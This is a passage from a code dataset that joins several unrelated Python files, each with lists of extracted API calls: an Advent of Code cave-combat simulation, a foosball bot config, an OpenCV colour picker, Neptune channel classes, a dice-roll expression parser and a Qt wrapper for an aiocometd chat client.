from"""', 'Token'], {}), "('Resuming from', Token)\n", (9644, 9668), False, 'from six import print_\n'), ((11568, 11620), 'six.print_', 'print_', (['"""Syntax error, expecting value, saw """', 'Token'], {}), "('Syntax error, expecting value, saw ', Token)\n", (11574, 11620), False, 'from six import print_\n'), ((11967, 11988), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (11975, 11988), False, 'import six\n'), ((12104, 12125), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12112, 12125), False, 'import six\n'), ((12237, 12258), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12245, 12258), False, 'import six\n'), ((12299, 12320), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12307, 12320), False, 'import six\n'), ((12433, 12454), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12441, 12454), False, 'import six\n'), ((12497, 12518), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12505, 12518), False, 'import six\n'), ((12637, 12658), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12645, 12658), False, 'import six\n'), ((12701, 12722), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12709, 12722), False, 'import six\n'), ((15115, 15158), 'six.print_', 'print_', (['"""--- Creating obligations list ---"""'], {}), "('--- Creating obligations list ---')\n", (15121, 15158), False, 'from six import print_\n'), ((23714, 23743), 'six.print_', 'print_', (["('%15s' % parm)"], {'end': '""""""'}), "('%15s' % parm, end='')\n", (23720, 23743), False, 'from six import print_\n'), ((23914, 23924), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23920, 23924), False, 'from six import print_\n'), ((26753, 26800), 'six.print_', 'print_', (["('%s=%s, %s=%s' % (name1, v1, name2, v2))"], {}), "('%s=%s, %s=%s' % (name1, v1, name2, v2))\n", (26759, 26800), False, 'from six import print_\n'), ((13865, 13977), 'six.print_', 'print_', (['"""Warning: No non-singular value choices for """', 'CategoriesList[slot]', '"""; Pairs generation will fail."""'], {}), "('Warning: No non-singular value choices for ', CategoriesList[slot],\n '; Pairs generation will fail.')\n", (13871, 13977), False, 'from six import print_\n'), ((22767, 22803), 'six.print_', 'print_', (["(sep + '_')"], {'end': '""""""', 'file': 'dest'}), "(sep + '_', end='', file=dest)\n", (22773, 22803), False, 'from six import print_\n'), ((23874, 23904), 'six.print_', 'print_', (["('%15s' % value)"], {'end': '""""""'}), "('%15s' % value, end='')\n", (23880, 23904), False, 'from six import print_\n'), ((25742, 25794), 'six.print_', 'print_', (['"""Warning: schema mismatch in"""', 'initial_suite'], {}), "('Warning: schema mismatch in', initial_suite)\n", (25748, 25794), False, 'from six import print_\n'), ((25807, 25870), 'six.print_', 'print_', (['""" Column """', 'i', '("\'" + col + "\'")', '"""not in specification"""'], {}), '(\' Column \', i, "\'" + col + "\'", \'not in specification\')\n', (25813, 25870), False, 'from six import print_\n'), ((26230, 26303), 'six.print_', 'print_', (['"""*** Warning, format mismatch with initial suite """', 'initial_suite'], {}), "('*** Warning, format mismatch with initial suite ', initial_suite)\n", (26236, 26303), False, 'from six import print_\n'), ((26333, 26394), 'six.print_', 'print_', (['"""*** Expecting columns """', 'in_schema', '""" but saw """', 'vec'], {}), "('*** Expecting columns ', in_schema, ' but saw ', vec)\n", (26339, 26394), False, 'from six import print_\n'), ((9529, 9562), 'six.print_', 'print_', (['"""Discarding rest of file"""'], {}), "('Discarding rest of file')\n", (9535, 9562), False, 'from six import print_\n'), ((11052, 11107), 'six.print_', 'print_', (['"""*ERR* Unrecognized condition attribute:"""', 'cond'], {}), "('*ERR* Unrecognized condition attribute:', cond)\n", (11058, 11107), False, 'from six import print_\n')]
|
from dataclasses import dataclass
from typing import List, NamedTuple
import numpy as np
from generic_search import bfsCave, nodeToPath
wall = "#"
emptySpace = "."
class GridLocation(NamedTuple):
column: int
row: int
def __lt__(self, other):
return self.row < other.row or \
self.row == other.row and self.column < other.column
def openLocations(cave, location: GridLocation) -> List[GridLocation]:
"""
Return a list of the open locations around the given location. The locations are
in reading order.
"""
available = []
row = cave[location.row]
if location.row > 0 and cave[location.row - 1, location.column] == ".":
available.append(GridLocation(location.column, location.row - 1))
if location.column > 0 and row[location.column - 1] == ".":
available.append(GridLocation(location.column - 1, location.row))
if location.column + 1 < len(row) and row[location.column + 1] == ".":
available.append(GridLocation(location.column + 1, location.row))
if location.row + 1 < len(cave) and cave[location.row + 1, location.column] == ".":
available.append(GridLocation(location.column, location.row + 1))
return sorted(available)
def reachedLocation(currentLocation, goalLocation):
return abs(currentLocation.row - goalLocation.row) + abs(currentLocation.column - goalLocation.column) == 1
@dataclass
class Unit:
x: int
y: int
race: str
hitPoints: int = 200
attackDamage: int = 3
def __str__(self):
return f"{self.race}({self.hitPoints})"
def __lt__(self, other):
if self.y != other.y:
return self.y < other.y
return self.x < other.x
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def location(self):
return GridLocation(self.x, self.y)
def sameLocation(self, other):
"""
Return True if this unit is at the same location as other
"""
return self.x == other.x and self.y == other.y
def atLocation(self, x, y):
"""
Return True if this unit is at this x,y location
"""
return self.x == x and self.y == y
def distanceTo(self, other):
"""
Return the Manhattan distance between this unit and other
Keyword arguments:
other -- The other unit.
"""
return abs(self.x - other.x) + abs(self.y - other.y)
def canAttack(self, units):
"""
Return True if there is an enemy available to attack.
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
"""
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and self.distanceTo(unit) == 1:
return True
return False
def enemyExists(self, units):
"""
Return True if an enemy exists. The enemy does not need to be available for attack.
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
"""
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race:
return True
return False
def availableEnemies(self, cave, units):
"""
Return a list of available enemies in the list
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
cave -- The array representing the cave
"""
availableList = []
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and openLocations(cave, unit.location()):
availableList.append(unit)
return availableList
def move(self, cave, units) -> None:
targetLocation: GridLocation = None
shortestPath = None
enemies = self.availableEnemies(cave, units)
for enemy in enemies:
solution = bfsCave(self.location(), enemy.location(), reachedLocation, cave, openLocations)
if solution:
path = nodeToPath(solution)
# We found a path. Now see if it's a better candidate than one already found
pathEnd = path[-1]
if shortestPath is None or len(path) < len(shortestPath) or \
len(path) == len(shortestPath) and (pathEnd < targetLocation):
targetLocation = pathEnd
shortestPath = path
if shortestPath:
cave[self.y, self.x] = '.'
# The first step in the path is the current location so go to the second step
nextLocation: GridLocation = shortestPath[1]
self.x = nextLocation.column
self.y = nextLocation.row
cave[self.y, self.x] = self.race
def attack(self, cave, units):
"""
Attack an available enemy.
units -- A list of all units. Does not need to be sorted.
"""
target = None
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and self.distanceTo(unit) == 1:
if target is None or unit.hitPoints < target.hitPoints or \
unit.hitPoints == target.hitPoints and unit < target:
target = unit
if target is not None:
target.hitPoints -= self.attackDamage
if target.hitPoints <= 0:
cave[target.y, target.x] = "."
def printCave(cave, units, showScores=False):
for rowNumber, row in enumerate(cave):
scores = " "
for columnNumber, cell in enumerate(row):
print(cell, end='')
if showScores and cell in ["E", "G"]:
unit = next(unit for unit in units if unit.hitPoints > 0 and unit.atLocation(columnNumber, rowNumber))
scores += str(unit) + " "
if len(scores.strip()):
print(scores, end='')
print()
def loadPuzzle(puzzleName, elfAttackPower):
# Get the dimensions of the puzzle.
with open(puzzleName, "r") as infile:
puzzleHeight = 0
puzzleWidth = 0
for line in infile:
puzzleHeight += 1
puzzleWidth = max(puzzleWidth, len(line.rstrip()))
# Create the cave with the determined puzzle dimensions.
cave = np.full((puzzleHeight, puzzleWidth), '.', dtype=str)
units = []
# Populate the cave and the list of units.
with open(puzzleName, "r") as infile:
for rowNumber, line in enumerate(infile):
for columnNumber, cell in enumerate(line.rstrip()):
if cell in ['E', 'G']:
units.append(Unit(columnNumber, rowNumber, cell, attackDamage=3 if cell == 'G' else elfAttackPower))
cave[rowNumber, columnNumber] = cell
return cave, units
if __name__ == "15a":
cave, units = loadPuzzle("15.txt", 3)
finished = False
playRound = 0
while not finished:
for unit in units:
if unit.hitPoints <= 0:
continue
if not unit.enemyExists(units):
finished = True
break
if not unit.canAttack(units):
unit.move(cave, units)
unit.attack(cave, units)
if not finished:
playRound += 1
print(playRound)
livingUnits = [unit for unit in units if unit.hitPoints > 0]
units = sorted(livingUnits)
if __name__ == "__main__":
goblinsWin = True
elfAttackPower = 3
originalElfCount = 0
survivingElfCount = 0
while goblinsWin or survivingElfCount < originalElfCount:
elfAttackPower += 1
cave, units = loadPuzzle("15.txt", elfAttackPower)
originalElfCount = len([unit for unit in units if unit.race == "E"])
finished = False
playRound = 0
while not finished:
for unit in units:
if unit.hitPoints <= 0:
continue
if not unit.enemyExists(units):
finished = True
break
if not unit.canAttack(units):
unit.move(cave, units)
unit.attack(cave, units)
survivingElfCount = len([unit for unit in units if unit.race == "E" and unit.hitPoints > 0])
if survivingElfCount < originalElfCount:
finished = True
break
if not finished:
playRound += 1
print(playRound)
livingUnits = [unit for unit in units if unit.hitPoints > 0]
units = sorted(livingUnits)
goblinsWin = units[0].race == "G"
printCave(cave, units, showScores=True)
print(f"Combat ends after {playRound} full rounds")
hitPoints = sum([unit.hitPoints for unit in units])
survivingRace = "Goblins" if units[0].race == "G" else "Elves"
print(f"{survivingRace} win with {hitPoints} total hit points left")
print(f"Outcome: {playRound} * {hitPoints} = {playRound * hitPoints}")
print(f"Elf attack power: {elfAttackPower}")
|
[
"numpy.full",
"generic_search.nodeToPath"
] |
[((6315, 6367), 'numpy.full', 'np.full', (['(puzzleHeight, puzzleWidth)', '"""."""'], {'dtype': 'str'}), "((puzzleHeight, puzzleWidth), '.', dtype=str)\n", (6322, 6367), True, 'import numpy as np\n'), ((4063, 4083), 'generic_search.nodeToPath', 'nodeToPath', (['solution'], {}), '(solution)\n', (4073, 4083), False, 'from generic_search import bfsCave, nodeToPath\n')]
|
from datetime import time, timedelta
# Will print all read events to stdout.
DEBUG = False
DATA_PATH = "~/.tourney"
CHANNEL_NAME = "foosball"
RTM_READ_DELAY = 0.5 # seconds
RECONNECT_DELAY = 5.0 # seconds
COMMAND_REGEX = "!(\\w+)\\s*(.*)"
REACTION_REGEX = ":(.+):"
SCORE_ARGS_REGEX = "(T\\d+)\\s+(\\d+)\\s+(T\\d+)\\s+(\\d+)"
WIN_ARGS_REGEX = "(\\d+)\\s+(\\d+)"
MORNING_ANNOUNCE = time(9)
MORNING_ANNOUNCE_DELTA = timedelta(hours=1)
REMINDER_ANNOUNCE = time(11)
REMINDER_ANNOUNCE_DELTA = timedelta(minutes=49)
MIDDAY_ANNOUNCE = time(11, 50)
MIDDAY_ANNOUNCE_DELTA = timedelta(minutes=10)
POSITIVE_REACTIONS = [
"+1",
"the_horns",
"metal",
"raised_hands",
"ok",
"ok_hand",
"fire",
"tada",
"confetti_ball"
]
NEGATIVE_REACTIONS = ["-1", "middle_finger"]
PRIVILEGED_COMMANDS = ["undoteams", "generate", "autoupdate"]
TEAM_NAMES = [
"Air Farce",
"Cereal Killers",
"Dangerous Dynamos",
"Designated Drinkers",
"Fire Breaking Rubber Duckies",
"Game of Throw-ins",
"Injured Reserve",
"One Hit Wonders",
"Our Uniforms Match",
"Pique Blinders",
"Pistons from the Past",
"Purple Cobras",
"Rabid Squirrels",
"Raging Nightmare",
"Recipe for Disaster",
"Shockwave",
"Smarty Pints",
"Straight off the Couch",
"Tenacious Turtles",
"The Abusement Park",
"The Flaming Flamingos",
"The League of Ordinary Gentlemen",
"The Meme Team",
"The Mullet Mafia",
"Thunderpants",
]
|
[
"datetime.time",
"datetime.timedelta"
] |
[((385, 392), 'datetime.time', 'time', (['(9)'], {}), '(9)\n', (389, 392), False, 'from datetime import time, timedelta\n'), ((418, 436), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (427, 436), False, 'from datetime import time, timedelta\n'), ((458, 466), 'datetime.time', 'time', (['(11)'], {}), '(11)\n', (462, 466), False, 'from datetime import time, timedelta\n'), ((493, 514), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(49)'}), '(minutes=49)\n', (502, 514), False, 'from datetime import time, timedelta\n'), ((534, 546), 'datetime.time', 'time', (['(11)', '(50)'], {}), '(11, 50)\n', (538, 546), False, 'from datetime import time, timedelta\n'), ((571, 592), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (580, 592), False, 'from datetime import time, timedelta\n')]
|
# -*- coding: utf-8 -*-
import cv2
import sys
import numpy as np
import argparse
imagePath = "img.png"
sx = sy = None
previewImage = None
if len(sys.argv) < 3:
print("""
Usage:
python mouseInteractive -i img.png
""")
sys.exit(-1)
if sys.argv[1]=="-i":
imagePath = sys.argv[2]
def createBlankImage(width, height, color=(255,255,255)):
img = np.zeros((height, width, 3), np.uint8)
img[:] = color
return img
def mouseCallback(event,x,y,flags,param):
global sx,sy,previewImage
if (event == cv2.EVENT_LBUTTONDOWN):
print(event,x,y,flags,param)
bgrColor = frame[y][x]
previewImage = createBlankImage(200,200,bgrColor)
hsvColor = cv2.cvtColor(bgrColor.reshape(1,1,3),cv2.COLOR_BGR2HSV)
print("bgr->hsv:{}->{}".format(bgrColor,hsvColor.tolist()[0][0]))
cv2.circle(frame,(x,y),6, (0,0,255),-1)
if (sx != None):
cv2.line(frame,(sx,sy),(x,y),(0,0,255),3)
sx = x
sy = y
cv2.imshow('demo', frame)
cv2.imshow('preview', previewImage)
frame = cv2.imread(imagePath)
cv2.namedWindow("demo")
cv2.namedWindow("preview")
cv2.moveWindow("demo", 1500, 300)
cv2.moveWindow("preview", 1500, 80)
cv2.imshow('demo', frame)
cv2.setMouseCallback('demo', mouseCallback)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"cv2.line",
"cv2.circle",
"cv2.waitKey",
"cv2.destroyAllWindows",
"numpy.zeros",
"cv2.imread",
"cv2.setMouseCallback",
"sys.exit",
"cv2.moveWindow",
"cv2.imshow",
"cv2.namedWindow"
] |
[((1089, 1110), 'cv2.imread', 'cv2.imread', (['imagePath'], {}), '(imagePath)\n', (1099, 1110), False, 'import cv2\n'), ((1112, 1135), 'cv2.namedWindow', 'cv2.namedWindow', (['"""demo"""'], {}), "('demo')\n", (1127, 1135), False, 'import cv2\n'), ((1136, 1162), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview"""'], {}), "('preview')\n", (1151, 1162), False, 'import cv2\n'), ((1163, 1196), 'cv2.moveWindow', 'cv2.moveWindow', (['"""demo"""', '(1500)', '(300)'], {}), "('demo', 1500, 300)\n", (1177, 1196), False, 'import cv2\n'), ((1197, 1232), 'cv2.moveWindow', 'cv2.moveWindow', (['"""preview"""', '(1500)', '(80)'], {}), "('preview', 1500, 80)\n", (1211, 1232), False, 'import cv2\n'), ((1233, 1258), 'cv2.imshow', 'cv2.imshow', (['"""demo"""', 'frame'], {}), "('demo', frame)\n", (1243, 1258), False, 'import cv2\n'), ((1259, 1302), 'cv2.setMouseCallback', 'cv2.setMouseCallback', (['"""demo"""', 'mouseCallback'], {}), "('demo', mouseCallback)\n", (1279, 1302), False, 'import cv2\n'), ((1304, 1318), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1315, 1318), False, 'import cv2\n'), ((1319, 1342), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1340, 1342), False, 'import cv2\n'), ((248, 260), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (256, 260), False, 'import sys\n'), ((381, 419), 'numpy.zeros', 'np.zeros', (['(height, width, 3)', 'np.uint8'], {}), '((height, width, 3), np.uint8)\n', (389, 419), True, 'import numpy as np\n'), ((853, 898), 'cv2.circle', 'cv2.circle', (['frame', '(x, y)', '(6)', '(0, 0, 255)', '(-1)'], {}), '(frame, (x, y), 6, (0, 0, 255), -1)\n', (863, 898), False, 'import cv2\n'), ((1010, 1035), 'cv2.imshow', 'cv2.imshow', (['"""demo"""', 'frame'], {}), "('demo', frame)\n", (1020, 1035), False, 'import cv2\n'), ((1044, 1079), 'cv2.imshow', 'cv2.imshow', (['"""preview"""', 'previewImage'], {}), "('preview', previewImage)\n", (1054, 1079), False, 'import cv2\n'), ((930, 979), 'cv2.line', 'cv2.line', (['frame', '(sx, sy)', '(x, y)', '(0, 0, 255)', '(3)'], {}), '(frame, (sx, sy), (x, y), (0, 0, 255), 3)\n', (938, 979), False, 'import cv2\n')]
|
#
# Copyright (c) 2019, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from collections import namedtuple
from enum import Enum
ChannelNameWithTypeAndNamespace = namedtuple(
"ChannelNameWithType",
['channel_id', 'channel_name', 'channel_type', 'channel_namespace']
)
ChannelIdWithValues = namedtuple('ChannelIdWithValues', ['channel_id', 'channel_values'])
class ChannelType(Enum):
TEXT = 'text'
NUMERIC = 'numeric'
IMAGE = 'image'
class ChannelNamespace(Enum):
USER = 'user'
SYSTEM = 'system'
class ChannelValue(object):
def __init__(self, x, y, ts):
self._x = x
self._y = y
if ts is None:
ts = time.time()
self._ts = ts
@property
def ts(self):
return self._ts
@property
def x(self):
return self._x
@property
def y(self):
return self._y
def __str__(self):
return 'ChannelValue(x={},y={},ts={})'.format(self.x, self.y, self.ts)
def __repr__(self):
return str(self)
def __eq__(self, o):
return self.__dict__ == o.__dict__
def __ne__(self, o):
return not self.__eq__(o)
|
[
"collections.namedtuple",
"time.time"
] |
[((700, 806), 'collections.namedtuple', 'namedtuple', (['"""ChannelNameWithType"""', "['channel_id', 'channel_name', 'channel_type', 'channel_namespace']"], {}), "('ChannelNameWithType', ['channel_id', 'channel_name',\n 'channel_type', 'channel_namespace'])\n", (710, 806), False, 'from collections import namedtuple\n'), ((835, 902), 'collections.namedtuple', 'namedtuple', (['"""ChannelIdWithValues"""', "['channel_id', 'channel_values']"], {}), "('ChannelIdWithValues', ['channel_id', 'channel_values'])\n", (845, 902), False, 'from collections import namedtuple\n'), ((1209, 1220), 'time.time', 'time.time', ([], {}), '()\n', (1218, 1220), False, 'import time\n')]
|
#
# dice_roll_parser.py
#
# Copyright 2021, <NAME>
#
from plusminus import BaseArithmeticParser
# fmt: off
class DiceRollParser(BaseArithmeticParser):
"""
Parser for evaluating expressions representing rolls of dice, as used in many board and
role-playing games, such as:
d20
3d20
5d6 + d20
min(d6, d6, d6)
maxn(2, d6, d6, d6) (select top 2 of 3 d6 rolls)
show(d6, d6, d6)
"""
def customize(self):
import random
self.add_operator("d", 1, BaseArithmeticParser.RIGHT,
lambda a: random.randint(1, a))
self.add_operator("d", 2, BaseArithmeticParser.LEFT,
lambda a, b: sum(random.randint(1, b) for _ in range(a)))
self.add_function("min", ..., min)
self.add_function("max", ..., max)
self.add_function("show", ...,
lambda *args: {"rolls": list(args), "sum": sum(args)})
def maxn(n, *values):
ret = sorted(values, reverse=True)[:n]
return {"n": n, "rolls": values, "maxn": ret, "sum": sum(ret)}
self.add_function("maxn", ..., maxn)
# fmt: on
if __name__ == '__main__':
parser = DiceRollParser()
parser.runTests(
"""\
d20
3d6
d20+3d4
2d100
max(d6, d6, d6)
show(d6, d6, d6)
""",
postParse=lambda _, result: result[0].evaluate(),
)
|
[
"random.randint"
] |
[((593, 613), 'random.randint', 'random.randint', (['(1)', 'a'], {}), '(1, a)\n', (607, 613), False, 'import random\n'), ((719, 739), 'random.randint', 'random.randint', (['(1)', 'b'], {}), '(1, b)\n', (733, 739), False, 'import random\n')]
|
"""Synchronous CometD client"""
from enum import IntEnum, unique, auto
import asyncio
from functools import partial
from typing import Optional, Iterable, TypeVar, Awaitable, Callable, Any
import concurrent.futures as futures
from contextlib import suppress
import aiocometd
from aiocometd.typing import JsonObject
# pylint: disable=no-name-in-module
from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject # type: ignore
# pylint: enable=no-name-in-module
from aiocometd_chat_demo.exceptions import InvalidStateError
T_co = TypeVar("T_co", covariant=True) # pylint: disable=invalid-name
def run_coro(coro: Awaitable[T_co],
callback: Optional[Callable[["futures.Future[T_co]"], Any]]
= None,
loop: Optional[asyncio.AbstractEventLoop] = None,) \
-> "futures.Future[T_co]":
"""Schedule the execution of the given *coro* and set *callback* to be
called when the *coro* is finished
:param coro: A coroutine
:param callback: A callback function called with the future object \
associated with *coro*
:param loop: The event loop on which the *coro* should be scheduled
:return: The future associated with the *coro*
"""
if loop is None:
loop = asyncio.get_event_loop()
future = asyncio.run_coroutine_threadsafe(coro, loop)
if callback is not None:
future.add_done_callback(callback)
return future
@unique
class ClientState(IntEnum):
"""CometD client states"""
#: Connected with the server
CONNECTED = auto()
#: Disconnected state
DISCONNECTED = auto()
#: Disconnected state due to an error
ERROR = auto()
# pylint: disable=too-few-public-methods
class MessageResponse(QObject): # type: ignore
"""The asynchronous result of a sent CometD message"""
#: Contains the exception object if finished with an error, otherwise None
error: Optional[BaseException] = None
#: Contains the response of the server when finished successfully,
#: otherwise None
result: Optional[JsonObject] = None
#: Emited when the response has been received
finished = pyqtSignal()
# pylint: enable=too-few-public-methods
# pylint: disable=too-many-instance-attributes
class CometdClient(QObject): # type: ignore
"""Synchronous CometD client implementation
This class enables the asynchronous Client class from aiocometd to be used
in synchronous code if it runs on a quamash event loop.
Since the event loop is shared by Qt's and asyncio's events, the
concurrent.futures.Future can't be awaited, blocking is not allowed.
Instead, this class is implemented similarly to how asynchronous network
operations are implemented in Qt. Namely, on a method call the operation
is started and the method immediately returns, and then the results or the
potential errors during the asynchronous operation are broadcasted with
signals.
"""
#: Signal emited when the client's state is changed
state_changed = pyqtSignal(ClientState)
#: Signal emited when the client enters the :obj:`~ClientState.CONNECTED`
#: state
connected = pyqtSignal()
#: Signal emited when the client enters the
#: :obj:`~ClientState.DISCONNECTED` state
disconnected = pyqtSignal()
#: Signal emited when the client enters the :obj:`~ClientState.ERROR` state
error = pyqtSignal(Exception)
#: Signal emited when a message has been received from the server
message_received = pyqtSignal(dict)
def __init__(self, url: str, subscriptions: Iterable[str],
loop: Optional[asyncio.AbstractEventLoop] = None) -> None:
"""
:param url: CometD service url
:param subscriptions: A list of channels to which the client should \
subscribe
:param loop: Event :obj:`loop <asyncio.BaseEventLoop>` used to
schedule tasks. If *loop* is ``None`` then
:func:`asyncio.get_event_loop` is used to get the default
event loop.
"""
super().__init__()
self._url = url
self._subscriptions = list(subscriptions)
self._loop = loop or asyncio.get_event_loop()
self._client: Optional[aiocometd.Client] = None
self._state = ClientState.DISCONNECTED
self._state_signals = {
ClientState.CONNECTED: self.connected,
ClientState.DISCONNECTED: self.disconnected,
}
self._connect_task: Optional["futures.Future[None]"] = None
@pyqtProperty(ClientState, notify=state_changed)
def state(self) -> ClientState:
"""Current state of the client"""
return self._state
@state.setter # type: ignore
def state(self, new_state: ClientState) -> None:
"""Set the state of the client to *state*"""
# if the state didn't changed then don't do anything
if new_state != self._state:
self._state = new_state
# notify listeners that the state changed
self.state_changed.emit(self._state)
# emit state specific signals
if new_state in self._state_signals:
self._state_signals[new_state].emit()
def connect_(self) -> None:
"""Connect to the CometD service and start listening for messages
The function returns immediately. On success the
:obj:`~CometdClient.connected` signal is emited or the
:obj:`~CometdClient.error` signal on failure. If the client is already
connected then it does nothing.
"""
# don't do anything if already connected
if self.state != ClientState.CONNECTED:
# schedule the coroutine for execution
self._connect_task = run_coro(
self._connect(),
self._on_connect_done,
self._loop
)
async def _connect(self) -> None:
"""Connect to the CometD service and retreive the messages sent by
the service as long as the client is open
"""
# connect to the service
async with aiocometd.Client(self._url, loop=self._loop) as client:
# set the asynchronous client attribute
self._client = client
# subscribe to all the channels
for subscription in self._subscriptions:
await client.subscribe(subscription)
# put the client into a connected state
self.state = ClientState.CONNECTED
# listen for incoming messages
with suppress(futures.CancelledError):
async for message in client:
# emit signal about received messages
self._loop.call_soon_threadsafe(self.message_received.emit,
message)
# clear the asynchronous client attribute
self._client = None
# put the client into a disconnected state
self.state = ClientState.DISCONNECTED
def _on_connect_done(self, future: "futures.Future[None]") -> None:
"""Evaluate the result of an asynchronous task
Emit signals about errors if the *future's* result is an exception.
:param future: A future associated with the asynchronous task
"""
# clear the task member
self._connect_task = None
error = None
with suppress(futures.CancelledError):
error = future.exception()
if error is not None:
self.state = ClientState.ERROR
self.error.emit(error)
def disconnect_(self) -> None:
"""Disconnect from the CometD service
If the client is not connected it does nothing.
"""
if self.state == ClientState.CONNECTED:
# check that the task has been initialized
if self._connect_task is None:
raise InvalidStateError("Uninitialized _connect_task "
"attribute.")
self._connect_task.cancel()
def publish(self, channel: str, data: JsonObject) -> MessageResponse:
"""Publish *data* to the given *channel*
:param channel: Name of the channel
:param data: Data to send to the server
:return: Return the response associated with the message
"""
# check that the client has been initialized
if self.state != ClientState.CONNECTED:
raise InvalidStateError("Can't send messages in a non-connected "
"state.")
if self._client is None:
raise InvalidStateError("Uninitialized _client attribute.")
response = MessageResponse()
run_coro(self._client.publish(channel, data),
partial(self._on_publish_done, response),
self._loop)
return response
@staticmethod
def _on_publish_done(response: MessageResponse,
future: "futures.Future[JsonObject]") -> None:
"""Evaluate the result of an asynchronous message sending task
:param response: A response associated with the *future*
:param future: A future associated with the asynchronous task
"""
# set the error or result attributes of the response depending on
# whether it was completed normally or it exited with an exception
if future.exception() is not None:
response.error = future.exception()
else:
response.result = future.result()
# notify listeners that a response has been received
response.finished.emit()
# pylint: disable=too-many-instance-attributes
|
[
"PyQt5.QtCore.pyqtSignal",
"functools.partial",
"asyncio.get_event_loop",
"aiocometd_chat_demo.exceptions.InvalidStateError",
"contextlib.suppress",
"aiocometd.Client",
"PyQt5.QtCore.pyqtProperty",
"asyncio.run_coroutine_threadsafe",
"enum.auto",
"typing.TypeVar"
] |
[((533, 564), 'typing.TypeVar', 'TypeVar', (['"""T_co"""'], {'covariant': '(True)'}), "('T_co', covariant=True)\n", (540, 564), False, 'from typing import Optional, Iterable, TypeVar, Awaitable, Callable, Any\n'), ((1279, 1323), 'asyncio.run_coroutine_threadsafe', 'asyncio.run_coroutine_threadsafe', (['coro', 'loop'], {}), '(coro, loop)\n', (1311, 1323), False, 'import asyncio\n'), ((1532, 1538), 'enum.auto', 'auto', ([], {}), '()\n', (1536, 1538), False, 'from enum import IntEnum, unique, auto\n'), ((1584, 1590), 'enum.auto', 'auto', ([], {}), '()\n', (1588, 1590), False, 'from enum import IntEnum, unique, auto\n'), ((1645, 1651), 'enum.auto', 'auto', ([], {}), '()\n', (1649, 1651), False, 'from enum import IntEnum, unique, auto\n'), ((2121, 2133), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (2131, 2133), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3005, 3028), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['ClientState'], {}), '(ClientState)\n', (3015, 3028), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3136, 3148), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (3146, 3148), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3262, 3274), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (3272, 3274), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3367, 3388), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['Exception'], {}), '(Exception)\n', (3377, 3388), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((3482, 3498), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['dict'], {}), '(dict)\n', (3492, 3498), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((4527, 4574), 'PyQt5.QtCore.pyqtProperty', 'pyqtProperty', (['ClientState'], {'notify': 'state_changed'}), '(ClientState, notify=state_changed)\n', (4539, 4574), False, 'from PyQt5.QtCore import pyqtSignal, pyqtProperty, QObject\n'), ((1241, 1265), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1263, 1265), False, 'import asyncio\n'), ((4175, 4199), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (4197, 4199), False, 'import asyncio\n'), ((6094, 6138), 'aiocometd.Client', 'aiocometd.Client', (['self._url'], {'loop': 'self._loop'}), '(self._url, loop=self._loop)\n', (6110, 6138), False, 'import aiocometd\n'), ((7388, 7420), 'contextlib.suppress', 'suppress', (['futures.CancelledError'], {}), '(futures.CancelledError)\n', (7396, 7420), False, 'from contextlib import suppress\n'), ((8444, 8510), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Can\'t send messages in a non-connected state."""'], {}), '("Can\'t send messages in a non-connected state.")\n', (8461, 8510), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n'), ((8601, 8654), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Uninitialized _client attribute."""'], {}), "('Uninitialized _client attribute.')\n", (8618, 8654), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n'), ((8763, 8803), 'functools.partial', 'partial', (['self._on_publish_done', 'response'], {}), 